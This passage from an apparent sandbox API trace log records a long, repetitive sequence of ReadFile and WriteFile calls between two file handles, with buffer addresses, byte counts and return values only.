lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.404] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.404] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.405] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.405] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.406] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.406] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x266, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.407] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.407] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.408] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.408] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.414] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.415] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.415] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.416] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.416] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.417] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.417] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.418] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.418] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.419] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.419] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.420] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.420] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.421] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.421] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.422] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.422] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.422] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.423] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x218, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.423] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.424] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x268, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.424] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.425] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x263, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.425] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.426] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.426] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.427] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.427] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.428] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x305, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.428] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.429] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.429] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.430] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.430] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.431] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.431] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x393, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.432] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x386, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.433] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.433] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.434] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.434] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.435] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.435] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.436] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.436] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.437] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.437] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.438] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.438] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.439] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.439] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.440] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.440] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.440] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.441] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.441] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.442] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.442] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.443] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.443] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.444] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.444] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.445] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.445] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.446] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.446] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.447] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.447] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.448] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.448] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.449] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x352, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.449] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.450] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.450] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.451] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.451] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.452] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.452] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.453] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.453] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.454] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.454] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.455] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.455] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.456] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.456] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.457] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x4bd370, 